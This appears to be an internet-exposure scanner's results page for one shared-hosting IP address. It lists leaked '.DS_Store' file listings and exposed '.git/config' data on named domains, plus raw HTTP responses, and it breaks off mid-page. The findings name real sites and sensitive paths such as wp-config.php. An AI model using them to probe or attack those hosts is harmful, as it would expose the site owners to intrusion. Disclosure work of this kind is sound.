Fingerprint: 5f32cf5d6962f09cd4047824d40478241b871cc2a40ce067d868b186c56b30b4Found 35 files trough .DS_Store spidering: /.DS_Store /.git /.gitignore /.htaccess /authorize.php /CHANGELOG.txt /COPYRIGHT.txt /cron.php /includes /index.php /INSTALL.mysql.txt /INSTALL.pgsql.txt /install.php /INSTALL.sqlite.txt /INSTALL.txt /LICENSE.txt /MAINTAINERS.txt /misc /modules /profiles /README.txt /robots.txt /scripts /sites /sites/all /sites/all/libraries /sites/all/libraries/less.php /sites/default /sites/example.sites.php /sites/README.txt /themes /update.php /UPGRADE.txt /web.config /xmlrpc.php
Found on 2022-12-18 18:41
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-12-18 18:41-
Severity: medium
Fingerprint: 5f32cf5d6962f09cd4047824d40478241b871cc2a40ce067d868b186c56b30b4Found 35 files trough .DS_Store spidering: /.DS_Store /.git /.gitignore /.htaccess /authorize.php /CHANGELOG.txt /COPYRIGHT.txt /cron.php /includes /index.php /INSTALL.mysql.txt /INSTALL.pgsql.txt /install.php /INSTALL.sqlite.txt /INSTALL.txt /LICENSE.txt /MAINTAINERS.txt /misc /modules /profiles /README.txt /robots.txt /scripts /sites /sites/all /sites/all/libraries /sites/all/libraries/less.php /sites/default /sites/example.sites.php /sites/README.txt /themes /update.php /UPGRADE.txt /web.config /xmlrpc.php
Found on 2022-12-18 18:41
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.First seen 2022-06-17 17:47
Last seen 2022-12-17 18:41
Open for 183 days-
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044baa2727ab8135b5bbc521bbb7b3419b2[core] repositoryformatversion = 0 filemode = false bare = false logallrefupdates = true symlinks = false ignorecase = true [submodule] active = . [remote "origin"] url = https://github.com/duynguyen0613/front-end-crowd-funding.git fetch = +refs/heads/*:refs/remotes/origin/* [branch "main"] remote = origin merge = refs/heads/main
Found on 2022-06-17 17:47343 Bytes
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: presslergroup.siteplan.co.il
Port: 80
URL: http://presslergroup.siteplan.co.ilFirst seen 2022-10-02 17:49
Last seen 2022-12-02 18:43
Open for 61 days-
Severity: medium
Fingerprint: 5f32cf5d6962f09cccd847a3ccd847a38aa96330a09b19a066549274f167ddd3Found 43 files trough .DS_Store spidering: /0.php /assets /class-phpmailer.php /class-smtp.php /css /dist /favicon /favicon/android-icon-144x144.png /favicon/android-icon-192x192.png /favicon/android-icon-36x36.png /favicon/android-icon-48x48.png /favicon/android-icon-72x72.png /favicon/android-icon-96x96.png /favicon/apple-icon-114x114.png /favicon/apple-icon-120x120.png /favicon/apple-icon-144x144.png /favicon/apple-icon-152x152.png /favicon/apple-icon-180x180.png /favicon/apple-icon-57x57.png /favicon/apple-icon-60x60.png /favicon/apple-icon-72x72.png /favicon/apple-icon-76x76.png /favicon/apple-icon-precomposed.png /favicon/apple-icon.png /favicon/browserconfig.xml /favicon/favicon-16x16.png /favicon/favicon-32x32.png /favicon/favicon-96x96.png /favicon/favicon.ico /favicon/manifest.json /favicon/ms-icon-144x144.png /favicon/ms-icon-150x150.png /favicon/ms-icon-310x310.png /favicon/ms-icon-70x70.png /images /img /index.php /js /mail.php /mix-manifest.json /og.png /robots.txt /web.config
Found on 2022-10-02 17:49
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.presslergroup.siteplan.co.il
Port: 80
URL: http://www.presslergroup.siteplan.co.ilFirst seen 2022-10-02 17:49
Last seen 2022-12-02 18:43
Open for 61 days-
Severity: medium
Fingerprint: 5f32cf5d6962f09cccd847a3ccd847a38aa96330a09b19a066549274f167ddd3Found 43 files trough .DS_Store spidering: /0.php /assets /class-phpmailer.php /class-smtp.php /css /dist /favicon /favicon/android-icon-144x144.png /favicon/android-icon-192x192.png /favicon/android-icon-36x36.png /favicon/android-icon-48x48.png /favicon/android-icon-72x72.png /favicon/android-icon-96x96.png /favicon/apple-icon-114x114.png /favicon/apple-icon-120x120.png /favicon/apple-icon-144x144.png /favicon/apple-icon-152x152.png /favicon/apple-icon-180x180.png /favicon/apple-icon-57x57.png /favicon/apple-icon-60x60.png /favicon/apple-icon-72x72.png /favicon/apple-icon-76x76.png /favicon/apple-icon-precomposed.png /favicon/apple-icon.png /favicon/browserconfig.xml /favicon/favicon-16x16.png /favicon/favicon-32x32.png /favicon/favicon-96x96.png /favicon/favicon.ico /favicon/manifest.json /favicon/ms-icon-144x144.png /favicon/ms-icon-150x150.png /favicon/ms-icon-310x310.png /favicon/ms-icon-70x70.png /images /img /index.php /js /mail.php /mix-manifest.json /og.png /robots.txt /web.config
Found on 2022-10-02 17:49
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.eliot.austynandbrian.com
Port: 80
URL: http://www.eliot.austynandbrian.comFirst seen 2022-09-25 17:36
Last seen 2022-11-25 18:40
Open for 61 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-09-25 17:36
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-09-25 17:36
Last seen 2022-11-25 18:40
Open for 61 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-09-25 17:36
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.jenna.austynandbrian.com
Port: 80
URL: http://www.jenna.austynandbrian.comFirst seen 2022-11-23 18:39-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-11-23 18:39
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.sophie.austynandbrian.com
Port: 80
URL: http://www.sophie.austynandbrian.comFirst seen 2022-11-23 18:39-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-11-23 18:39
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-11-23 18:39-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-11-23 18:39
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-11-23 18:39-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-11-23 18:39
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-09-12 17:40
Last seen 2022-11-12 18:40
Open for 61 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-09-12 17:40
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.sage.austynandbrian.com
Port: 80
URL: http://www.sage.austynandbrian.comFirst seen 2022-09-12 17:40
Last seen 2022-11-12 18:40
Open for 61 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-09-12 17:40
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: saffron.austynandbrian.com
Port: 80
URL: http://saffron.austynandbrian.comFirst seen 2022-09-12 17:40
Last seen 2022-11-12 18:40
Open for 61 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-09-12 17:40
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: omegamedia-ltd.siteplan.co.il
Port: 80
URL: http://omegamedia-ltd.siteplan.co.ilFirst seen 2022-08-28 17:39
Last seen 2022-10-28 17:59
Open for 61 days-
Severity: medium
Fingerprint: 5f32cf5d6962f09cccd847a3ccd847a38aa96330a09b19a066549274f167ddd3Found 43 files trough .DS_Store spidering: /0.php /assets /class-phpmailer.php /class-smtp.php /css /dist /favicon /favicon/android-icon-144x144.png /favicon/android-icon-192x192.png /favicon/android-icon-36x36.png /favicon/android-icon-48x48.png /favicon/android-icon-72x72.png /favicon/android-icon-96x96.png /favicon/apple-icon-114x114.png /favicon/apple-icon-120x120.png /favicon/apple-icon-144x144.png /favicon/apple-icon-152x152.png /favicon/apple-icon-180x180.png /favicon/apple-icon-57x57.png /favicon/apple-icon-60x60.png /favicon/apple-icon-72x72.png /favicon/apple-icon-76x76.png /favicon/apple-icon-precomposed.png /favicon/apple-icon.png /favicon/browserconfig.xml /favicon/favicon-16x16.png /favicon/favicon-32x32.png /favicon/favicon-96x96.png /favicon/favicon.ico /favicon/manifest.json /favicon/ms-icon-144x144.png /favicon/ms-icon-150x150.png /favicon/ms-icon-310x310.png /favicon/ms-icon-70x70.png /images /img /index.php /js /mail.php /mix-manifest.json /og.png /robots.txt /web.config
Found on 2022-08-28 17:39
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.omegamedia-ltd.siteplan.co.il
Port: 80
URL: http://www.omegamedia-ltd.siteplan.co.ilFirst seen 2022-08-28 17:39
Last seen 2022-10-28 17:59
Open for 61 days-
Severity: medium
Fingerprint: 5f32cf5d6962f09cccd847a3ccd847a38aa96330a09b19a066549274f167ddd3Found 43 files trough .DS_Store spidering: /0.php /assets /class-phpmailer.php /class-smtp.php /css /dist /favicon /favicon/android-icon-144x144.png /favicon/android-icon-192x192.png /favicon/android-icon-36x36.png /favicon/android-icon-48x48.png /favicon/android-icon-72x72.png /favicon/android-icon-96x96.png /favicon/apple-icon-114x114.png /favicon/apple-icon-120x120.png /favicon/apple-icon-144x144.png /favicon/apple-icon-152x152.png /favicon/apple-icon-180x180.png /favicon/apple-icon-57x57.png /favicon/apple-icon-60x60.png /favicon/apple-icon-72x72.png /favicon/apple-icon-76x76.png /favicon/apple-icon-precomposed.png /favicon/apple-icon.png /favicon/browserconfig.xml /favicon/favicon-16x16.png /favicon/favicon-32x32.png /favicon/favicon-96x96.png /favicon/favicon.ico /favicon/manifest.json /favicon/ms-icon-144x144.png /favicon/ms-icon-150x150.png /favicon/ms-icon-310x310.png /favicon/ms-icon-70x70.png /images /img /index.php /js /mail.php /mix-manifest.json /og.png /robots.txt /web.config
Found on 2022-08-28 17:39
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-21 18:07-
Severity: low
Fingerprint: 5f32cf5d6962f09c63442d9d63442d9d80af1e5580af1e5580af1e5580af1e55Found 1 files trough .DS_Store spidering: /wp-content
Found on 2022-10-21 18:07
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-21 18:07-
Severity: low
Fingerprint: 5f32cf5d6962f09c63442d9d63442d9d80af1e5580af1e5580af1e5580af1e55Found 1 files trough .DS_Store spidering: /wp-content
Found on 2022-10-21 18:07
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-21 18:07-
Severity: low
Fingerprint: 5f32cf5d6962f09c63442d9d63442d9d80af1e5580af1e5580af1e5580af1e55Found 1 files trough .DS_Store spidering: /wp-content
Found on 2022-10-21 18:07
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-21 18:07-
Severity: low
Fingerprint: 5f32cf5d6962f09c63442d9d63442d9d80af1e5580af1e5580af1e5580af1e55Found 1 files trough .DS_Store spidering: /wp-content
Found on 2022-10-21 18:07
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-21 18:07-
Severity: low
Fingerprint: 5f32cf5d6962f09c63442d9d63442d9d80af1e5580af1e5580af1e5580af1e55Found 1 files trough .DS_Store spidering: /wp-content
Found on 2022-10-21 18:07
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-21 18:07-
Severity: low
Fingerprint: 5f32cf5d6962f09c63442d9d63442d9d80af1e5580af1e5580af1e5580af1e55Found 1 files trough .DS_Store spidering: /wp-content
Found on 2022-10-21 18:07
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.saffron.austynandbrian.com
Port: 80
URL: http://www.saffron.austynandbrian.comFirst seen 2022-09-12 17:40-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-09-12 17:40
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: winston.austynandbrian.com
Port: 80
URL: http://winston.austynandbrian.comFirst seen 2022-09-10 17:39-
Severity: low
Fingerprint: 5f32cf5d6962f09cae99eea9ae99eea96367f45a086ed07d01b7f20fc0dbb463Found 23 files trough .DS_Store spidering: /index.php /jetpack-onboarding /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-09-10 17:39
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.winston.austynandbrian.com
Port: 80
URL: http://www.winston.austynandbrian.comFirst seen 2022-09-10 17:38-
Severity: low
Fingerprint: 5f32cf5d6962f09cae99eea9ae99eea96367f45a086ed07d01b7f20fc0dbb463Found 23 files trough .DS_Store spidering: /index.php /jetpack-onboarding /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-09-10 17:38
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.First seen 2022-06-17 17:47
Last seen 2022-08-17 17:47
Open for 61 days-
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044baa2727ab8135b5bbc521bbb7b3419b2[core] repositoryformatversion = 0 filemode = false bare = false logallrefupdates = true symlinks = false ignorecase = true [submodule] active = . [remote "origin"] url = https://github.com/duynguyen0613/front-end-crowd-funding.git fetch = +refs/heads/*:refs/remotes/origin/* [branch "main"] remote = origin merge = refs/heads/main
Found on 2022-06-17 17:47343 Bytes
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.IP: 162.241.253.33
Domain: mail.ytx.gil.mybluehost.me
Port: 80
URL: http://mail.ytx.gil.mybluehost.meFirst seen 2022-06-17 17:47
Last seen 2022-08-17 17:47
Open for 61 days-
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044baa2727ab8135b5bbc521bbb7b3419b2[core] repositoryformatversion = 0 filemode = false bare = false logallrefupdates = true symlinks = false ignorecase = true [submodule] active = . [remote "origin"] url = https://github.com/duynguyen0613/front-end-crowd-funding.git fetch = +refs/heads/*:refs/remotes/origin/* [branch "main"] remote = origin merge = refs/heads/main
Found on 2022-06-17 17:47343 Bytes
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.First seen 2022-06-17 17:47
Last seen 2022-08-17 17:47
Open for 61 days-
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044baa2727ab8135b5bbc521bbb7b3419b2[core] repositoryformatversion = 0 filemode = false bare = false logallrefupdates = true symlinks = false ignorecase = true [submodule] active = . [remote "origin"] url = https://github.com/duynguyen0613/front-end-crowd-funding.git fetch = +refs/heads/*:refs/remotes/origin/* [branch "main"] remote = origin merge = refs/heads/main
Found on 2022-06-17 17:47343 Bytes
-
-
Open service 162.241.253.33:443 · adultseo-net.wpcats.com
2024-09-16 09:59
HTTP/1.1 302 Found Date: Mon, 16 Sep 2024 09:59:25 GMT Server: Apache Location: https://adultseo-net.wpcats.com/cgi-sys/suspendedpage.cgi Content-Length: 241 Connection: close Content-Type: text/html; charset=iso-8859-1 Page title: 302 Found <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://adultseo-net.wpcats.com/cgi-sys/suspendedpage.cgi">here</a>.</p> </body></html>
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · www.nzs.zzm.mybluehost.me
2024-09-16 09:59
HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 09:59:17 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate Upgrade: h2,h2c Connection: Upgrade, close Cache-Control: max-age=7200 Expires: Mon, 16 Sep 2024 11:59:17 GMT Vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Newfold-Cache-Level: 2 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Page title: Welcome — Coming Soon <!DOCTYPE html> <html lang="en-US"> <head> <meta name="viewport" content="width=device-width"> <meta name="robots" content="noindex, nofollow" /> <title>Welcome — Coming Soon</title> <script src="https://offizielleszentrumchpass.com/wp-includes/js/jquery/jquery.js"></script> <style type="text/css">* { box-sizing: border-box; -moz-box-sizing: border-box; -webkit-box-sizing: border-box; } body { background-color: white; color: black; overflow-x: hidden; margin: 0; } #wrap { align-items: center; display: flex; justify-content: center; min-height: 100vh; } .content { flex: 1; margin: auto 5%; padding: 0; text-align: center; max-width: 420px; } footer { width: 100%; position: fixed; bottom: 0; left: 0; } footer p { text-align: center; } .btn { background: black; background-image: none; border: 1px solid black; box-shadow: none; color: white; cursor: pointer; display: inline-block; font-size: 14px; font-weight: 400; line-height: 1.5; margin-top: 10px; padding: 6px 30px; text-align: center; text-decoration: none; touch-action: manipulation; transition: all 0.2s ease; user-select: none; vertical-align: middle; white-space: nowrap; } .status-message { display: none; }</style> <link rel="stylesheet" href="https://offizielleszentrumchpass.com/wp-content/plugins/bluehost-wordpress-plugin/assets/styles/coming-soon.css?v=3.14.9" /> </head> <body> <div id="wrap"> <main class="content"> <div class="subscription_widget"> <h1>Coming Soon!</h1> <h2>A New WordPress Site</h2> <p class="comingsoon_links"><a href="https://www.bluehost.com/blog/how-to-create-a-website-guide/" target="_blank" rel="noopener noreferrer nofollow">How to Build a Website: A Practical Guide to WordPress on Bluehost</a><br /><a href="https://www.bluehost.com/blog/how-to-migrate-a-wordpress-website-to-a-new-server/" target="_blank" rel="noopener noreferrer nofollow">How to Migrate a Website to Bluehost?</a><br /><a href="https://www.bluehost.com/hosting/shared" target="_blank" rel="noopener noreferrer nofollow">Why choose Bluehost for your WordPress site?</a><br /></p> </div> </main> </div> <footer> <p class="text-center"> A <a href="https://bluehost.com?utm_source=coming-soon-template&utm_medium=bluehost_plugin" target="_blank" rel="noopener noreferrer nofollow">Bluehost</a> powered website. Is this your website? Log in to <a href="https://offizielleszentrumchpass.com/wp-login.php">WordPress</a> or <a href="https://my.bluehost.com/web-hosting/cplogin" target="_blank" rel="noopener noreferrer nofollow">Bluehost</a>. </p> </footer> </body> </html>Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · www.smokebreak.cafe
2024-09-16 09:57
HTTP/1.1 301 Moved Permanently Date: Mon, 16 Sep 2024 09:57:58 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Content-Length: 0 X-Redirect-By: WordPress Location: https://smokebreak.cafe/ Cache-Control: max-age=7200 Expires: Mon, 16 Sep 2024 11:57:57 GMT host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Newfold-Cache-Level: 3 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · www.brettstapleton.net
2024-09-16 09:56
HTTP/1.1 404 Not Found Date: Mon, 16 Sep 2024 09:56:48 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Page title: Brett's Tech — Coming Soon <!DOCTYPE html> <html dir="ltr" lang="en-US" prefix="og: https://ogp.me/ns#"> <head> <meta name="viewport" content="width=device-width"> <meta name="robots" content="noindex, nofollow" /> <title>Brett's Tech — Coming Soon</title> <script src="https://brettstapleton.net/wp-includes/js/jquery/jquery.js"></script> <style type="text/css">* { box-sizing: border-box; -moz-box-sizing: border-box; -webkit-box-sizing: border-box; } body { background-color: white; color: black; overflow-x: hidden; margin: 0; } #wrap { align-items: center; display: flex; justify-content: center; min-height: 100vh; } .content { flex: 1; margin: auto 5%; padding: 0; text-align: center; max-width: 420px; } footer { width: 100%; position: fixed; bottom: 0; left: 0; } footer p { text-align: center; } .btn { background: black; background-image: none; border: 1px 